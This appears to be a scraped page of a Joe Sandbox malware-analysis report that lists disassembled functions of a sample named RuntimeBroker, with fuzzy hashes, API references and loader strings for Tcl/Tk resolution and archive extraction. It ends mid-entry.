Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 2992c19c74acb62438dcc52d75b27739b2ea2664489bc1d3045697e198609fef
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 6551B436B18A5181E7369B2CC480A3CA3A1EB4CB58F645039CE4D577A5DB3AEC82CB50

Function 00007FF72B065040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 00ea9af1a7bcee566b9bf46f04e6d8b7669b453a75cb8a750873933d52db1ed0
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 3441B552F4974E05F9779B1C0D206BCA690EF1ABA0DE813B8CF99173F3CD0DA9868520

Function 00007FF72B0691B0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 4c2069438db7bd6821668209f3bed185f6ed925e7f6c63ba07488e81febeb59c
Instruction ID: 75dccc0c82609818b01c3e12ca7f65319112d258ee41551763d53c3a2cf7cdbe
Opcode Fuzzy Hash: 4c2069438db7bd6821668209f3bed185f6ed925e7f6c63ba07488e81febeb59c
Instruction Fuzzy Hash: 6641F462B14A5582EF18DF2ADD14269B3A1FB4CFD4B899436DF0D97B68DE3CD0418700

Function 00007FF72B0673F4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c8ce5197fab721537f96c549d365f36e8ddfeb9aabfd716177bbdff71b5849
Instruction ID: 8d8676c7c8f4dbcb279ec0951b1f22106c17a0746162f329d808d1e63a97277e
Opcode Fuzzy Hash: 27c8ce5197fab721537f96c549d365f36e8ddfeb9aabfd716177bbdff71b5849
Instruction Fuzzy Hash: 1F31A432B19B8241E775AF2A684413EBAD5EB88B90F54423CEE5D53BA5DF3CE0114B14

Function 00007FF72B078880 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction ID: 8b17da926192666405c7a296c4d3332443967e683a8defa4143602a576aeff1c
Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction Fuzzy Hash: E0F04F71A286958EDBA59F3EA80262DB7D4F708380B80C079E68983A14D67C91608F14

Function 00007FF72B05C62C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction ID: 47ea1eecf651145d63681f368ac4097bdc2921666bfc2a2dd6c0a20e7ceca2b4
Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction Fuzzy Hash: 35A00121919826D4EA6AAB08ACE0135A660FB50300B801031D00D424B09F2CA502DB20

Function 00007FF72B056EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF72B056EB7
GetProcAddress.KERNEL32 ref: 00007FF72B056EFD
GetProcAddress.KERNEL32 ref: 00007FF72B056F22
GetProcAddress.KERNEL32 ref: 00007FF72B056F47
GetProcAddress.KERNEL32 ref: 00007FF72B056F6F
GetProcAddress.KERNEL32 ref: 00007FF72B056F97
GetProcAddress.KERNEL32 ref: 00007FF72B056FBF
GetProcAddress.KERNEL32 ref: 00007FF72B056FE7
GetProcAddress.KERNEL32 ref: 00007FF72B05700F

Strings

Tk_GetNumMainWindows, xrefs: 00007FF72B0573C5, 00007FF72B0573E1
Tcl_EvalFile, xrefs: 00007FF72B0572D5, 00007FF72B0572F1
Tcl_Init, xrefs: 00007FF72B056EB0, 00007FF72B056EC9
Tcl_Finalize, xrefs: 00007FF72B056F65, 00007FF72B056F81
Tcl_ConditionFinalize, xrefs: 00007FF72B0570CD, 00007FF72B0570E9
Tcl_MutexUnlock, xrefs: 00007FF72B05707D, 00007FF72B057099
Tcl_NewByteArrayObj, xrefs: 00007FF72B05725D, 00007FF72B057279
Tcl_GetString, xrefs: 00007FF72B05720D, 00007FF72B057229
Tcl_EvalObjv, xrefs: 00007FF72B057325, 00007FF72B057341
GetProcAddress, xrefs: 00007FF72B056ED7
Tcl_NewStringObj, xrefs: 00007FF72B057235, 00007FF72B057251
Tcl_MutexLock, xrefs: 00007FF72B057055, 00007FF72B057071
Tcl_GetObjResult, xrefs: 00007FF72B0572AD, 00007FF72B0572C9
Tcl_MutexFinalize, xrefs: 00007FF72B0570A5, 00007FF72B0570C1
Tcl_Free, xrefs: 00007FF72B057375, 00007FF72B057391
Tcl_ConditionNotify, xrefs: 00007FF72B0570F5, 00007FF72B057111
Tcl_SetVar2Ex, xrefs: 00007FF72B057285, 00007FF72B0572A1
Tcl_DoOneEvent, xrefs: 00007FF72B056F3D, 00007FF72B056F59
Tk_Init, xrefs: 00007FF72B05739D, 00007FF72B0573B9
Tcl_FinalizeThread, xrefs: 00007FF72B056F8D, 00007FF72B056FA9
Tcl_CreateInterp, xrefs: 00007FF72B056EF3, 00007FF72B056F0F
Tcl_Alloc, xrefs: 00007FF72B05734D, 00007FF72B057369
Tcl_CreateThread, xrefs: 00007FF72B056FDD, 00007FF72B056FF9
Tcl_GetCurrentThread, xrefs: 00007FF72B057005, 00007FF72B057021
Tcl_EvalEx, xrefs: 00007FF72B0572FD, 00007FF72B057319
Tcl_DeleteInterp, xrefs: 00007FF72B056FB5, 00007FF72B056FD1
Tcl_ThreadQueueEvent, xrefs: 00007FF72B057145, 00007FF72B057161
Tcl_JoinThread, xrefs: 00007FF72B05702D, 00007FF72B057049
Tcl_FindExecutable, xrefs: 00007FF72B056F18, 00007FF72B056F34
Tcl_GetVar2, xrefs: 00007FF72B057195, 00007FF72B0571B1
Tcl_ThreadAlert, xrefs: 00007FF72B05716D, 00007FF72B057189
Tcl_CreateObjCommand, xrefs: 00007FF72B0571E5, 00007FF72B057201
Tcl_SetVar2, xrefs: 00007FF72B0571BD, 00007FF72B0571D9
Tcl_ConditionWait, xrefs: 00007FF72B05711D, 00007FF72B057139
Failed to get address for %hs, xrefs: 00007FF72B056ED0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: efbe7913ad2460dc7cbf451e4ce74f8dff6f659b493cfbaebe158866d6030a7e
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: D6E195A4A1AB43A0EA77BB5CAC941B4E3A5FF04750FC45135C80E126B4EF3CF549AB60

Function 00007FF72B0577D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B057C97,?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B05782C

Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF72B057840
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF72B057803
\, xrefs: 00007FF72B057861
CreateDirectory, xrefs: 00007FF72B057974
%.*s, xrefs: 00007FF72B05790C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF72B0578D9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF72B05796D
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF72B05789D

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: c8da6068e1258ae80fbd9bff6dbba274081ee91406ed979adb3213b7776bcad5
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: 10417061B2864281FA72BB2CDC916FAE251FF84784FC44435DA4E42AB5EE2CF5049F70

Function 00007FF72B0520F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF72B05211B
SelectObject.GDI32 ref: 00007FF72B052162
DrawTextW.USER32 ref: 00007FF72B052185
SelectObject.GDI32 ref: 00007FF72B05219B
ReleaseDC.USER32 ref: 00007FF72B0521AB
MoveWindow.USER32 ref: 00007FF72B0521FB
MoveWindow.USER32 ref: 00007FF72B05223B
MoveWindow.USER32 ref: 00007FF72B05228E
MoveWindow.USER32 ref: 00007FF72B0522D6

Strings

P%, xrefs: 00007FF72B05216F

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: d3ece5d01bbbb18aa78b8ac3ae954657df6fdaa7de3286a86073c4a7a856e066
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: 635109266047A186D6349F26E4581BAF7A1FB98B61F404135EFDE43794DF3CD085DB20

Function 00007FF72B0655A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0655E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0659D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065C6C

Strings

p, xrefs: 00007FF72B065695
p, xrefs: 00007FF72B06570D
f, xrefs: 00007FF72B065705
-, xrefs: 00007FF72B065679
:, xrefs: 00007FF72B06579C

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction ID: 280eb9b12fd52c87f133b4339c7fa31cd01d1114902cf1707a0b0a73453dd947
Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction Fuzzy Hash: 4A129031B0824B86FB36BB19D95427DE651FB48750FD4413AE789466E6EF3CE9808F20

Function 00007FF72B0602E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B060328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0606F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06098F

Strings

f, xrefs: 00007FF72B06042A
p, xrefs: 00007FF72B060432
f, xrefs: 00007FF72B060575
p, xrefs: 00007FF72B0603CD
f, xrefs: 00007FF72B0603C0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction ID: d23e6f81f4635485ad61dec4e4781a4c61a9f2389b2a0e2181bc2c83a5edb76a
Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction Fuzzy Hash: 44128471F4C14386FB35BB18D894A79E261FB94754FC88039E699466E4EF7CE4808F60

Function 00007FF72B051050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B0510C5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B051097
fseek, xrefs: 00007FF72B0510CC
fread, xrefs: 00007FF72B0511D7
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B0510F5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B0511D0
malloc, xrefs: 00007FF72B0510FC

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 871c4bd2f4272e85d2d648aab4226352bff6886030e1b1dfdb0960b12b81affd
Instruction ID: 66492195f0ef10e113b8ef074408a1253e2f3314250ab292c40fd796f3e19c80
Opcode Fuzzy Hash: 871c4bd2f4272e85d2d648aab4226352bff6886030e1b1dfdb0960b12b81affd
Instruction Fuzzy Hash: FC41AF21B0864642EA32BB1AAC905BAE390FF44BC4FC44031DD4D47BB5EE3CE8458B24

Function 00007FF72B051440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B0514A9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B05146F
fseek, xrefs: 00007FF72B0514B0
fread, xrefs: 00007FF72B0515A1
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B0514D9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B05159A
malloc, xrefs: 00007FF72B0514E0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: ba58478d193cca447d1da911b598277bf25201e271742bc4703496163cb40152
Instruction ID: cc7eb8a895af5d21d6c8d2f38b358e7b3d4252bfbe6d0cc80e57d439a4af5606
Opcode Fuzzy Hash: ba58478d193cca447d1da911b598277bf25201e271742bc4703496163cb40152
Instruction Fuzzy Hash: 5B416121B0864281EA32BB19AC915BAE390FF487D4FD44431DE4D47EB5EE3CE9459F10

Function 00007FF72B05DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF72B05DD85

Part of subcall function 00007FF72B05ECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF72B05ED1F
Part of subcall function 00007FF72B05ECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF72B05ED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF72B05DE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF72B05E0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF72B05E1B8

Strings

csm, xrefs: 00007FF72B05DE06
csm, xrefs: 00007FF72B05DD9F
csm, xrefs: 00007FF72B05DE80

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: e48fad1f0e5b5b7ef7c7672a152cc725cef7ad8491b71f53b0e99254011291a5
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: C6D19632A0874186EB31AB69D8C03ADB7A4FB55788F504235DE8D57FA5DF38E491CB20

Function 00007FF72B06E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E19C
GetProcAddress.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E1A8

Strings

api-ms-, xrefs: 00007FF72B06E0E6
ext-ms-, xrefs: 00007FF72B06E0F9

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: c29af694b380f90edae54ea361c0482262d6b7f358b6779e58d424d0fe77a646
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: 7C41D531B1570281FA37AB1AAC14676A391FF49B90FC84539DE0D4B7B4EE3CE5459B20

Function 00007FF72B05CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

